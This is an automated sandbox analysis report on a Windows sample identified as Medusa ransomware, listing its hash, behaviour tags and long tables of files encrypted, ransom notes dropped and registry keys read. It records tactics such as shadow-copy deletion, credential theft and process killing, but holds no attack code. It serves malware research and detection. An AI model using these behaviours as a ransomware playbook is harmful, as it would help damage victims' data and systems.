Malware Analysis Report

2024-12-07 17:08

Sample ID 241002-ngp6zaxdlb
Target 20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike
SHA256 91a3b832564a9b29685b393c8bda9925a7da87fd3958625980da06f80f76109d
Tags
medusaransomware defense_evasion discovery execution impact ransomware spyware stealer credential_access persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

91a3b832564a9b29685b393c8bda9925a7da87fd3958625980da06f80f76109d

Threat Level: Known bad

The file 20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike was found to be: Known bad.

Malicious Activity Summary

medusaransomware defense_evasion discovery execution impact ransomware spyware stealer credential_access persistence

Medusa Ransomware

Renames multiple (11170) files with added filename extension

Renames multiple (8807) files with added filename extension

Deletes shadow copies

Boot or Logon Autostart Execution: Active Setup

Credentials from Password Stores: Windows Credential Manager

Reads user/profile data of web browsers

Drops startup file

Drops desktop.ini file(s)

Enumerates connected drives

Network Share Discovery

Drops file in Program Files directory

Unsigned PE

Browser Information Discovery

Program crash

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Runs net.exe

Suspicious use of FindShellTrayWindow

Kills process with taskkill

Suspicious use of SendNotifyMessage

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Modifies registry class

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-02 11:22

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-02 11:22

Reported

2024-10-02 11:25

Platform

win7-20240903-en

Max time kernel

145s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"

Signatures

Medusa Ransomware

ransomware medusaransomware

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (11170) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\EHDN25ED\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\X9WSUL7T\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\YFS4OGJW\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-457978338-2990298471-2379561640-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TL381H8Y\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\GRU3FPRK\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-457978338-2990298471-2379561640-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MX1BY2FD\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OBDG6J46\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RYYHNCRR\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A

Network Share Discovery

discovery

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\it\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.jpg C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\js\weather.js C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_output\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\settings.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.conf C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\slideShow.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\AWARDHM.POC C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssLogo.gif C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CNFRES.CFG C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen.css C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\XLICONS.EXE C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\be.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_right.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\ProPlusWW.XML C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_s.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\RSSFeeds.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kaliningrad C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\js\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\14\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0157763.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME41.CSS C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hy.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcor.dll.mui C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\css\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\Filters.xml C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-modules.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\en-US\PurblePlace.exe.mui C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSTORES.DLL C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Azores C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplate.html C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\Pacific\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00512_.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\eBook.api C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198494.WMF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR5B.GIF C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_m.png C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\sv-SE\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
